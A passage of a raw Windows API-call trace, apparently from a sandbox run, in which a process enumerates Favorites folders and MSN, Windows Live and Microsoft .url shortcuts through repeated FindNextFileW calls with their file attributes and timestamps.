out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.408] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0255.409] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0255.409] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0255.409] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0255.409] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0255.409] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0255.412] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.412] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0255.412] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0255.412] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0255.413] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0255.413] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0255.413] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0255.415] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.415] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0255.415] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0255.416] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0255.416] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0255.416] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0255.425] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0255.428] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0255.446] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0255.450] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: 